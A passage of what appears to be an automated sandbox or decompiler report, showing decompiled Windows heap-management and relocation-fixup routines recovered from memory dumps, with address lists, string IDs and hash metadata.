                                                        								goto L84;
                                                        							}
                                                        							_t286 = 1;
                                                        							__eflags = 1;
                                                        							while(1) {
                                                        								_t310 = _t286 & 0x0000ffff;
                                                        								_t308 =  *(_t228 + _t310 * 4);
                                                        								_t317 = _t317 + 0xc;
                                                        								__eflags =  *(_t228 + _t310 * 4) -  *((intOrPtr*)(_t317 + 8));
                                                        								if( *(_t228 + _t310 * 4) !=  *((intOrPtr*)(_t317 + 8))) {
                                                        									break;
                                                        								}
                                                        								_t286 = _t286 + 1;
                                                        								_t308 = 0x81;
                                                        								__eflags = _t286 - 0x81;
                                                        								if(_t286 < 0x81) {
                                                        									continue;
                                                        								}
                                                        								goto L68;
                                                        							}
                                                        							_t246 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                        							__eflags =  *(_t246 + 0xc);
                                                        							if( *(_t246 + 0xc) == 0) {
                                                        								_push("HEAP: ");
                                                        								E00B9373B();
                                                        							} else {
                                                        								E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                                        							}
                                                        							_push( *((intOrPtr*)(_v8 + (_t286 & 0x0000ffff) * 4)));
                                                        							_push( *((intOrPtr*)(_t317 + 8)));
                                                        							E00B9373B("Pseudo Tag %04x size incorrect (%x != %x) %p\n", _t286 & 0x0000ffff);
                                                        							goto L84;
                                                        						}
                                                        						_t257 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                        						__eflags =  *(_t257 + 0xc);
                                                        						if( *(_t257 + 0xc) == 0) {
                                                        							_push("HEAP: ");
                                                        							E00B9373B();
                                                        						} else {
                                                        							E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                                        						}
                                                        						_push(_t311[0x1e]);
                                                        						_push(_v24);
                                                        						_push("Total size of free blocks in arena (%ld) does not match number total in heap header (%ld)\n");
                                                        						L57:
                                                        						E00B9373B();
                                                        						goto L84;
                                                        					}
                                                        					if( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) == 0) {
                                                        						_push("HEAP: ");
                                                        						E00B9373B();
                                                        					} else {
                                                        						E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                                        					}
                                                        					_push(_t316);
                                                        					_push(_v20);
                                                        					_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
                                                        					goto L57;
                                                        				} else {
                                                        					L74:
                                                        					return 1;
                                                        				}
                                                        			}
                                                        0x00bf0e11
                                                        0x00bf0e14
                                                        0x00bf0e15
                                                        0x00bf0e17
                                                        0x00bf0e17
                                                        0x00bf0e1a
                                                        0x00bf0e1d
                                                        0x00bf0e24
                                                        0x00000000
                                                        0x00bf0e29
                                                        0x00bf0d14
                                                        0x00bf0d14
                                                        0x00bf0d15
                                                        0x00bf0d15
                                                        0x00bf0d18
                                                        0x00bf0d1b
                                                        0x00bf0d1e
                                                        0x00bf0d21
                                                        0x00000000
                                                        0x00000000
                                                        0x00bf0d23
                                                        0x00bf0d24
                                                        0x00bf0d29
                                                        0x00bf0d2c
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00bf0d2c
                                                        0x00bf0d86
                                                        0x00bf0d89
                                                        0x00bf0d8c
                                                        0x00bf0dae
                                                        0x00bf0db3
                                                        0x00bf0d8e
                                                        0x00bf0da6
                                                        0x00bf0dab
                                                        0x00bf0dbf
                                                        0x00bf0dc2
                                                        0x00bf0dcb
                                                        0x00000000
                                                        0x00bf0dd0
                                                        0x00bf0cbe
                                                        0x00bf0cc1
                                                        0x00bf0cc5
                                                        0x00bf0ce7
                                                        0x00bf0cec
                                                        0x00bf0cc7
                                                        0x00bf0cdf
                                                        0x00bf0ce4
                                                        0x00bf0cf2
                                                        0x00bf0cf5
                                                        0x00bf0cf8
                                                        0x00bf0ca3
                                                        0x00bf0ca3
                                                        0x00000000
                                                        0x00bf0ca8
                                                        0x00bf0c6d
                                                        0x00bf0c8f
                                                        0x00bf0c94
                                                        0x00bf0c6f
                                                        0x00bf0c87
                                                        0x00bf0c8c
                                                        0x00bf0c9a
                                                        0x00bf0c9b
                                                        0x00bf0c9e
                                                        0x00000000
                                                        0x00bf0d77
                                                        0x00bf0d77
                                                        0x00000000
                                                        0x00bf0d77

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%x != %x) %p$RtlFreeHeap$Tag %04x (%ws) size incorrect (%x != %x) %p$Total size of free blocks in arena (%ld) does not match number total in heap header (%ld)$dedicated (%04x) free list element %p is marked busy
                                                        • API String ID: 0-3316276410
                                                        • Opcode ID: fe79f17033f16bfe1475474a665cae2a4e3e3988431df695c489faa9a3462032
                                                        • Instruction ID: 3c907f7fe18edcfda962c770ffc3a6a59804931dbf58ca00868508791f9f9964
                                                        • Opcode Fuzzy Hash: fe79f17033f16bfe1475474a665cae2a4e3e3988431df695c489faa9a3462032
                                                        • Instruction Fuzzy Hash: E5F1D075A10249AFCB20EF68C480FBAB7E5FF04710F5484E5E9859B6A2C734AE49DB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 57%
                                                        			E00BECFB1(signed int _a4, intOrPtr _a8) {
                                                        				unsigned int _v8;
                                                        				intOrPtr _v12;
                                                        				intOrPtr _v16;
                                                        				intOrPtr _v20;
                                                        				signed short* _v24;
                                                        				intOrPtr _v28;
                                                        				intOrPtr _v32;
                                                        				intOrPtr _v36;
                                                        				intOrPtr _t82;
                                                        				unsigned int _t88;
                                                        				intOrPtr _t92;
                                                        				unsigned int _t94;
                                                        				unsigned int _t96;
                                                        				char* _t97;
                                                        				void* _t99;
                                                        				intOrPtr _t100;
                                                        				void* _t104;
                                                        				intOrPtr _t105;
                                                        				void* _t109;
                                                        				intOrPtr _t110;
                                                        				void* _t118;
                                                        				unsigned int _t120;
                                                        				signed char _t130;
                                                        				void* _t132;
                                                        				signed int _t134;
                                                        				char* _t136;
                                                        				char* _t138;
                                                        				unsigned int _t149;
                                                        				intOrPtr _t157;
                                                        				unsigned int* _t158;
                                                        				signed short* _t159;
                                                        				char* _t162;
                                                        				void* _t164;
                                                        				signed int _t167;
                                                        				signed int _t169;
                                                        				signed int _t171;
                                                        				signed int _t174;
                                                        				intOrPtr _t179;
                                                        				intOrPtr _t186;
                                                        				intOrPtr _t189;
                                                        				intOrPtr* _t192;
                                                        				unsigned int _t196;
                                                        				void* _t208;
                                                        
                                                        				_t130 = _a4;
                                                        				_t82 =  *((intOrPtr*)(_t130 + 0x18));
                                                        				_t186 =  *((intOrPtr*)(_t130 + 8));
                                                        				_t179 =  *((intOrPtr*)(_t130 + 0x24)) -  *((intOrPtr*)(_t82 + 0x28));
                                                        				_t132 = _t186 -  *((intOrPtr*)(_t82 + 0x20));
                                                        				_t120 = _t179 - _t132;
                                                        				_v36 = _t186;
                                                        				_v32 = _t179;
                                                        				_v8 = _t120;
                                                        				_v16 =  *((intOrPtr*)(_t82 + 0xc));
                                                        				_v12 =  *((intOrPtr*)(_t82 + 8));
                                                        				if(_t179 != 0 || _t132 != 0) {
                                                        					_v20 = E00B547E4(_t132, _t186);
                                                        					if(_v12 == 0) {
                                                        						goto L39;
                                                        					} else {
                                                        						goto L3;
                                                        					}
                                                        					while(1) {
                                                        						L3:
                                                        						_t157 = _v16;
                                                        						_v12 = _v12 - 1;
                                                        						if(_t157 == 0 || _t157 >=  *((intOrPtr*)(_v20 + 0x50))) {
                                                        							break;
                                                        						}
                                                        						_t158 = _t157 + _t186;
                                                        						_t88 =  *_t158;
                                                        						_t134 = _t88 << 0xc;
                                                        						_a4 = _t88 >> 0x14;
                                                        						_v28 = _t186 + _t134;
                                                        						_t189 = _v16 + 4 + _a4 * 2;
                                                        						_t92 =  *((intOrPtr*)(_v20 + 0x50));
                                                        						_v16 = _t189;
                                                        						if(_t134 >= _t92 || _t189 >= _t92 || (_a4 & 0x00000001) != 0) {
                                                        							_push("Invalid fixup information\n");
                                                        							_push(0);
                                                        							_push(0x55);
                                                        							E00B93F92();
                                                        							break;
                                                        						} else {
                                                        							_t159 =  &(_t158[1]);
                                                        							while(1) {
                                                        								_v24 = _t159;
                                                        								if(_a4 == 0) {
                                                        									break;
                                                        								}
                                                        								_t94 =  *_t159 & 0x0000ffff;
                                                        								_a4 = _a4 - 1;
                                                        								_t192 = (_t94 & 0x00000fff) + _v28;
                                                        								_t96 = _t94 >> 0xc;
                                                        								if(_t96 == 0) {
                                                        									_t97 = 0xb42926;
                                                        									if(_a4 == 0) {
                                                        										_t97 = " (padding)";
                                                        									}
                                                        									E00B93F92(0x55, 2, "\t          None%s\n", _t97);
                                                        									_t208 = _t208 + 0x10;
                                                        									L17:
                                                        									_t159 =  &(_v24[1]);
                                                        									continue;
                                                        								}
                                                        								_t99 = _t96 - 1;
                                                        								if(_t99 == 0) {
                                                        									_t136 = 0xb42926;
                                                        									if(_t179 == 0) {
                                                        										_t136 = "(no change)";
                                                        									}
                                                        									_t100 =  *_t192;
                                                        									_push(_t136);
                                                        									_push(_t100 + _t179);
                                                        									_push(_t100);
                                                        									asm("cdq");
                                                        									_push(_t159);
                                                        									E00B93F92(0x55, 2, "\t%08I64X: VA32 %08X -> %08X %s\n", _t192);
                                                        									_t208 = _t208 + 0x20;
                                                        									if(_t179 != 0) {
                                                        										 *((intOrPtr*)(_t192 + _a8)) =  *((intOrPtr*)(_t192 + _a8)) + _t179;
                                                        									}
                                                        									goto L17;
                                                        								}
                                                        								_t104 = _t99 - 1;
                                                        								if(_t104 == 0) {
                                                        									_t138 = 0xb42926;
                                                        									if(_t120 == 0) {
                                                        										_t138 = "(no change)";
                                                        									}
                                                        									_t105 =  *_t192;
                                                        									_push(_t138);
                                                        									_t76 = _t120 + 4; // 0x253a7834
                                                        									_push(_t105 + _t192 + _t76);
                                                        									_push(_t105 + _t120);
                                                        									_push(_t105);
                                                        									asm("cdq");
                                                        									_push(_t159);
                                                        									E00B93F92(0x55, 2, "\t%08I64X: PC32 %08X -> %08X (target %p) %s\n", _t192);
                                                        									_t208 = _t208 + 0x24;
                                                        									if(_t120 != 0) {
                                                        										 *((intOrPtr*)(_t192 + _a8)) =  *((intOrPtr*)(_t192 + _a8)) + _t120;
                                                        									}
                                                        									goto L17;
                                                        								}
                                                        								_t109 = _t104 - 1;
                                                        								if(_t109 == 0) {
                                                        									_t162 = 0xb42926;
                                                        									if(_t179 == 0) {
                                                        										_t162 = "(no change)";
                                                        									}
                                                        									_t110 =  *_t192;
                                                        									_push(_t162);
                                                        									_t164 = _t110 + _t179;
                                                        									asm("adc ecx, ebx");
                                                        									_push( *((intOrPtr*)(_t192 + 4)));
                                                        									_push(_t164);
                                                        									_push( *((intOrPtr*)(_t192 + 4)));
                                                        									_push(_t110);
                                                        									asm("cdq");
                                                        									_push(_t164);
                                                        									E00B93F92(0x55, 2, "\t%08I64X: VA64 %016I64X -> %016I64X %s\n", _t192);
                                                        									_t208 = _t208 + 0x28;
                                                        									if(_t179 != 0) {
                                                        										 *((intOrPtr*)(_t192 + _a8)) =  *((intOrPtr*)(_t192 + _a8)) + _t179;
                                                        										asm("adc [esi+0x4], ebx");
                                                        									}
                                                        									L16:
                                                        									_t120 = _v8;
                                                        									goto L17;
                                                        								}
                                                        								if(_t109 != 1) {
                                                        									asm("cdq");
                                                        									_push(_t159);
                                                        									E00B93F92(0x55, 0, "\t%08I64X: Unknown\n", _t192);
                                                        									goto L38;
                                                        								}
                                                        								if(_t120 == 0) {
                                                        									goto L17;
                                                        								} else {
                                                        									_t118 = _a8 + _t192;
                                                        									_t196 =  *(_t118 + 0xc);
                                                        									_t167 = _t196 >> 0x0000001b & 0x00000001;
                                                        									_t169 = _t167 << 0x00000017 |  *(_t118 + 8) & 0x007fffff;
                                                        									_t171 = _t169 << 0x00000010 |  *(_t118 + 4) >> 0x00000010;
                                                        									_t149 = (((0 << 0x00000020 | _t167) << 0x17 << 0x00000020 | _t169) << 0x10 << 0x00000020 | _t171) << 0x14;
                                                        									_t174 = (_t171 << 0x00000014 | _t196 >> 0x00000004 & 0x000fffff) + (_v8 >> 4);
                                                        									asm("adc ecx, ebx");
                                                        									 *(_t118 + 8) = (_t149 >> 0x00000004 ^  *(_t118 + 8)) & 0x007fffff ^  *(_t118 + 8);
                                                        									_t179 = _v32;
                                                        									 *(_t118 + 4) = (_t149 << 0x00000020 | _t174) >> 0x14 << 0x00000010 |  *(_t118 + 4) & 0x0000ffff;
                                                        									 *(_t118 + 0xc) = ((_t149 >> 0x0000001b & 0x00000001) << 0x00000017 | _t174 & 0x000fffff) << 0x00000004 |  *(_t118 + 0xc) & 0xf700000f;
                                                        									goto L16;
                                                        								}
                                                        							}
                                                        							if(_v12 == 0) {
                                                        								goto L39;
                                                        							}
                                                        							_t186 = _v36;
                                                        							continue;
                                                        						}
                                                        					}
                                                        					L38:
                                                        					return 0xc000007b;
                                                        				} else {
                                                        					L39:
                                                        					return 0;
                                                        				}
                                                        			}














































                                                        0x00bed17b
                                                        0x00bed182
                                                        0x00bed184
                                                        0x00bed184
                                                        0x00bed189
                                                        0x00bed18e
                                                        0x00bed193
                                                        0x00bed195
                                                        0x00bed197
                                                        0x00bed198
                                                        0x00bed199
                                                        0x00bed19c
                                                        0x00bed19f
                                                        0x00bed1a0
                                                        0x00bed1ab
                                                        0x00bed1b0
                                                        0x00bed1b5
                                                        0x00bed1bc
                                                        0x00bed1be
                                                        0x00bed1be
                                                        0x00bed154
                                                        0x00bed154
                                                        0x00000000
                                                        0x00bed154
                                                        0x00bed09d
                                                        0x00bed273
                                                        0x00bed274
                                                        0x00bed27e
                                                        0x00000000
                                                        0x00bed283
                                                        0x00bed0a5
                                                        0x00000000
                                                        0x00bed0ab
                                                        0x00bed0ae
                                                        0x00bed0b0
                                                        0x00bed0bb
                                                        0x00bed0cf
                                                        0x00bed0e2
                                                        0x00bed0ed
                                                        0x00bed101
                                                        0x00bed103
                                                        0x00bed119
                                                        0x00bed12c
                                                        0x00bed14e
                                                        0x00bed151
                                                        0x00000000
                                                        0x00bed151
                                                        0x00bed0a5
                                                        0x00bed16d
                                                        0x00000000
                                                        0x00000000
                                                        0x00bed173
                                                        0x00000000
                                                        0x00bed173
                                                        0x00bed04b
                                                        0x00bed299
                                                        0x00000000
                                                        0x00bed2a0
                                                        0x00bed2a0
                                                        0x00000000
                                                        0x00bed2a0

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID:
                                                        • String ID: None%s$%08I64X: PC32 %08X -> %08X (target %p) %s$%08I64X: Unknown$%08I64X: VA32 %08X -> %08X %s$%08I64X: VA64 %016I64X -> %016I64X %s$ (padding)$(no change)$Invalid fixup information$`%V
                                                        • API String ID: 0-1337375492
                                                        • Opcode ID: b1e60289ae52c799dd19378d7d08d75855dec843628ef6a2b78081847c8968b7
                                                        • Instruction ID: 92b65b60681a6e9b29d155269d1c2dbe469d127a7471684bc136c2ee3d46ce6f
                                                        • Opcode Fuzzy Hash: b1e60289ae52c799dd19378d7d08d75855dec843628ef6a2b78081847c8968b7
                                                        • Instruction Fuzzy Hash: 0191E3B2E00615ABDB188F49CC91A6973E5EB88710F19C1BDEA19AB381D6B0DD41C791
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 65%
                                                        			E00BF1238(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                        				signed int _t123;
                                                        				signed int _t124;
                                                        				void* _t130;
                                                        				intOrPtr _t132;
                                                        				signed int _t145;
                                                        				signed int _t146;
                                                        				signed int _t147;
                                                        				intOrPtr _t151;
                                                        				intOrPtr _t163;
                                                        				signed int _t173;
                                                        				signed int _t174;
                                                        				signed int _t178;
                                                        				short _t184;
                                                        				signed int _t193;
                                                        				signed int _t194;
                                                        				intOrPtr _t197;
                                                        				intOrPtr _t219;
                                                        				short* _t233;
                                                        				void* _t246;
                                                        				intOrPtr _t248;
                                                        				signed int _t251;
                                                        				signed int _t253;
                                                        				signed int _t254;
                                                        				void* _t255;
                                                        				void* _t256;
                                                        
                                                        				_t246 = __edx;
                                                        				_push(0x18);
                                                        				_push(0xb4d158);
                                                        				_t123 = E00B4DF5C(__ebx, __edi, __esi);
                                                        				_t248 =  *((intOrPtr*)(_t255 + 8));
                                                        				 *((intOrPtr*)(_t255 + 8)) = _t248;
                                                        				 *((char*)(_t255 - 0x19)) = 0;
                                                        				 *(_t255 - 0x24) = 0;
                                                        				if(( *(_t248 + 0x44) & 0x01000000) == 0) {
                                                        					 *(_t255 - 4) = 0;
                                                        					 *(_t255 - 4) = 1;
                                                        					_t232 = "RtlReAllocateHeap";
                                                        					_t124 = E00B585CA(_t248, "RtlReAllocateHeap");
                                                        					__eflags = _t124;
                                                        					if(_t124 != 0) {
                                                        						 *(_t255 + 0xc) =  *(_t255 + 0xc) |  *(_t248 + 0x44) | 0x10000100;
                                                        						_t251 =  *(_t255 + 0x14);
                                                        						__eflags = _t251;
                                                        						if(_t251 == 0) {
                                                        							_t235 = 1;
                                                        							__eflags = 1;
                                                        						} else {
                                                        							_t235 = _t251;
                                                        						}
                                                        						_t130 = ( *((intOrPtr*)(_t248 + 0x98)) + _t235 &  *(_t248 + 0x9c)) + 8;
                                                        						__eflags = _t130 - _t251;
                                                        						if(_t130 < _t251) {
                                                        							L66:
                                                        							_t132 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                        							__eflags =  *(_t132 + 0xc);
                                                        							if( *(_t132 + 0xc) == 0) {
                                                        								_push("HEAP: ");
                                                        								E00B9373B();
                                                        							} else {
                                                        								E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                                        							}
                                                        							_push( *((intOrPtr*)(_t248 + 0x7c)));
                                                        							E00B9373B("Invalid allocation size - %x (exceeded %x)\n", _t251);
                                                        							E00BF06F9(0);
                                                        							_t117 = _t255 - 0x24;
                                                        							 *_t117 =  *(_t255 - 0x24) & 0x00000000;
                                                        							__eflags =  *_t117;
                                                        							goto L71;
                                                        						} else {
                                                        							__eflags = _t130 -  *((intOrPtr*)(_t248 + 0x7c));
                                                        							if(_t130 >  *((intOrPtr*)(_t248 + 0x7c))) {
                                                        								goto L66;
                                                        							}
                                                        							__eflags =  *(_t255 + 0xc) & 0x00000001;
                                                        							if(__eflags == 0) {
                                                        								E00B422D0(__eflags,  *((intOrPtr*)(_t248 + 0xcc)));
                                                        								 *((char*)(_t255 - 0x19)) = 1;
                                                        								_t26 = _t255 + 0xc;
                                                        								 *_t26 =  *(_t255 + 0xc) | 0x00000001;
                                                        								__eflags =  *_t26;
                                                        							}
                                                        							E00BF098E(_t235, _t246, _t248, 0);
                                                        							_t253 =  *((intOrPtr*)(_t255 + 0x10)) + 0xfffffff8;
                                                        							__eflags =  *((char*)(_t253 + 7)) - 5;
                                                        							if( *((char*)(_t253 + 7)) == 5) {
                                                        								_t253 = _t253 - (( *(_t253 + 6) & 0x000000ff) << 3);
                                                        								__eflags = _t253;
                                                        							}
                                                        							_t145 = E00B80ED7(_t235, _t248, _t253, _t232);
                                                        							__eflags = _t145;
                                                        							if(_t145 == 0) {
                                                        								L52:
                                                        								_t146 =  *(_t255 - 0x24);
                                                        								__eflags = _t146;
                                                        								if(_t146 == 0) {
                                                        									L71:
                                                        									_t119 = _t255 - 4;
                                                        									 *_t119 =  *(_t255 - 4) & 0x00000000;
                                                        									__eflags =  *_t119;
                                                        									 *(_t255 - 4) = 0xfffffffe;
                                                        									E00BF16C3();
                                                        									_t123 =  *(_t255 - 0x24);
                                                        									goto L72;
                                                        								}
                                                        								__eflags = _t146 -  *0xc27928; // 0x0
                                                        								if(__eflags != 0) {
                                                        									_t147 = E00B58131();
                                                        									__eflags = _t147 & 0x00000800;
                                                        									if((_t147 & 0x00000800) == 0) {
                                                        										goto L71;
                                                        									}
                                                        									__eflags =  *(_t255 - 0x20) -  *0xc2792c; // 0x0
                                                        									if(__eflags != 0) {
                                                        										goto L71;
                                                        									}
                                                        									__eflags =  *((intOrPtr*)(_t248 + 0x80)) -  *0xc2792e; // 0x0
                                                        									if(__eflags != 0) {
                                                        										goto L71;
                                                        									}
                                                        									_t151 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                        									__eflags =  *(_t151 + 0xc);
                                                        									if( *(_t151 + 0xc) == 0) {
                                                        										_push("HEAP: ");
                                                        										E00B9373B();
                                                        									} else {
                                                        										E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                                        									}
                                                        									_push(E00BDF719(_t248,  *(_t255 - 0x20)));
                                                        									_push( *(_t255 + 0x14));
                                                        									E00B9373B("Just reallocated block at %p to 0x%x bytes with tag %ws\n",  *(_t255 - 0x24));
                                                        									L58:
                                                        									E00BF06F9(0);
                                                        									goto L71;
                                                        								}
                                                        								_t163 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                        								__eflags =  *(_t163 + 0xc);
                                                        								if( *(_t163 + 0xc) == 0) {
                                                        									_push("HEAP: ");
                                                        									E00B9373B();
                                                        								} else {
                                                        									E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                                        								}
                                                        								_push( *(_t255 + 0x14));
                                                        								E00B9373B("Just reallocated block at %p to %x bytes\n",  *0xc27928);
                                                        								goto L58;
                                                        							} else {
                                                        								__eflags =  *((intOrPtr*)(_t255 + 0x10)) -  *0xc27928; // 0x0
                                                        								if(__eflags != 0) {
                                                        									_t173 = E00B58131();
                                                        									__eflags = _t173 & 0x00000800;
                                                        									if((_t173 & 0x00000800) == 0) {
                                                        										L37:
                                                        										_t174 = E00B5C7BC(_t248,  *(_t255 + 0xc),  *((intOrPtr*)(_t255 + 0x10)),  *(_t255 + 0x14));
                                                        										 *(_t255 - 0x24) = _t174;
                                                        										__eflags = _t174;
                                                        										if(_t174 != 0) {
                                                        											_t70 = _t174 - 8; // -8
                                                        											_t254 = _t70;
                                                        											__eflags =  *((char*)(_t254 + 7)) - 5;
                                                        											if( *((char*)(_t254 + 7)) == 5) {
                                                        												_t254 = _t254 - (( *(_t254 + 6) & 0x000000ff) << 3);
                                                        												__eflags = _t254;
                                                        											}
                                                        											__eflags =  *(_t248 + 0x4c);
                                                        											if( *(_t248 + 0x4c) != 0) {
                                                        												 *_t254 =  *_t254 ^  *(_t248 + 0x50);
                                                        												__eflags =  *(_t254 + 3) - ( *(_t254 + 2) ^  *(_t254 + 1) ^  *_t254);
                                                        												if(__eflags != 0) {
                                                        													_push(0);
                                                        													_push(_t254);
                                                        													_push(_t248);
                                                        													E00BEF8EE(_t232, _t248, _t254, __eflags);
                                                        												}
                                                        											}
                                                        											__eflags =  *(_t254 + 2) & 0x00000002;
                                                        											if(( *(_t254 + 2) & 0x00000002) == 0) {
                                                        												_t178 =  *(_t254 + 3) & 0xff;
                                                        											} else {
                                                        												_t233 = E00B72568(_t254);
                                                        												__eflags =  *(_t248 + 0x40) & 0x08000000;
                                                        												if(( *(_t248 + 0x40) & 0x08000000) == 0) {
                                                        													_t184 = 0;
                                                        													__eflags = 0;
                                                        												} else {
                                                        													_t184 = E00BE9AF6();
                                                        												}
                                                        												 *_t233 = _t184;
                                                        												_t178 =  *(_t233 + 2) & 0x0000ffff;
                                                        											}
                                                        											 *(_t255 - 0x20) = _t178;
                                                        											__eflags =  *(_t248 + 0x4c);
                                                        											if( *(_t248 + 0x4c) != 0) {
                                                        												_t235 =  *(_t254 + 2) & 0x000000ff;
                                                        												 *(_t254 + 3) =  *(_t254 + 1) & 0x000000ff ^  *_t254 & 0x000000ff ^  *(_t254 + 2) & 0x000000ff;
                                                        												 *_t254 =  *_t254 ^  *(_t248 + 0x50);
                                                        												__eflags =  *_t254;
                                                        											}
                                                        										}
                                                        										E00BEFB7A(_t235, _t246, _t248, 1);
                                                        										E00BF098E(_t235, _t246, _t248, 0);
                                                        										goto L52;
                                                        									}
                                                        									_t232 = 0;
                                                        									__eflags =  *0xc2792c - _t232; // 0x0
                                                        									if(__eflags == 0) {
                                                        										goto L37;
                                                        									}
                                                        									__eflags =  *(_t248 + 0x4c);
                                                        									if( *(_t248 + 0x4c) != 0) {
                                                        										 *_t253 =  *_t253 ^  *(_t248 + 0x50);
                                                        										__eflags =  *(_t253 + 3) - ( *(_t253 + 2) ^  *(_t253 + 1) ^  *_t253);
                                                        										if(__eflags != 0) {
                                                        											_push(0);
                                                        											_push(_t253);
                                                        											_push(_t248);
                                                        											E00BEF8EE(0, _t248, _t253, __eflags);
                                                        										}
                                                        									}
                                                        									__eflags =  *(_t253 + 2) & 0x00000002;
                                                        									if(( *(_t253 + 2) & 0x00000002) == 0) {
                                                        										_t193 =  *(_t253 + 3) & 0xff;
                                                        									} else {
                                                        										_t193 =  *(E00B72568(_t253) + 2) & 0x0000ffff;
                                                        									}
                                                        									 *(_t255 - 0x20) = _t193;
                                                        									__eflags =  *(_t248 + 0x4c) - _t232;
                                                        									if( *(_t248 + 0x4c) != _t232) {
                                                        										_t235 =  *(_t253 + 2) & 0x000000ff;
                                                        										 *(_t253 + 3) =  *(_t253 + 1) & 0x000000ff ^  *_t253 & 0x000000ff ^  *(_t253 + 2) & 0x000000ff;
                                                        										 *_t253 =  *_t253 ^  *(_t248 + 0x50);
                                                        										__eflags =  *_t253;
                                                        									}
                                                        									_t194 =  *(_t255 - 0x20);
                                                        									__eflags = _t194 - _t232;
                                                        									if(_t194 != _t232) {
                                                        										__eflags = _t194 -  *0xc2792c; // 0x0
                                                        										if(__eflags != 0) {
                                                        											goto L37;
                                                        										}
                                                        										__eflags =  *((intOrPtr*)(_t248 + 0x80)) -  *0xc2792e; // 0x0
                                                        										if(__eflags != 0) {
                                                        											goto L37;
                                                        										}
                                                        										_t197 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                        										__eflags =  *((intOrPtr*)(_t197 + 0xc)) - _t232;
                                                        										if( *((intOrPtr*)(_t197 + 0xc)) == _t232) {
                                                        											_push("HEAP: ");
                                                        											E00B9373B();
                                                        										} else {
                                                        											E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                                        										}
                                                        										_pop(_t235);
                                                        										_push(E00BDF719(_t248,  *(_t255 - 0x20)));
                                                        										_push( *(_t255 + 0x14));
                                                        										E00B9373B("About to rellocate block at %p to 0x%x bytes with tag %ws\n",  *((intOrPtr*)(_t255 + 0x10)));
                                                        										_t256 = _t256 + 0x10;
                                                        										_push(_t232);
                                                        										L36:
                                                        										E00BF06F9();
                                                        									}
                                                        									goto L37;
                                                        								}
                                                        								_t219 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                        								__eflags =  *(_t219 + 0xc);
                                                        								if( *(_t219 + 0xc) == 0) {
                                                        									_push("HEAP: ");
                                                        									E00B9373B();
                                                        								} else {
                                                        									E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                                        								}
                                                        								_pop(_t235);
                                                        								_push( *(_t255 + 0x14));
                                                        								E00B9373B("About to reallocate block at %p to %x bytes\n",  *0xc27928);
                                                        								_t256 = _t256 + 0xc;
                                                        								_push(0);
                                                        								goto L36;
                                                        							}
                                                        						}
                                                        					}
                                                        					 *(_t255 - 0x24) = 0;
                                                        					goto L71;
                                                        				} else {
                                                        					_push( *(_t255 + 0x14));
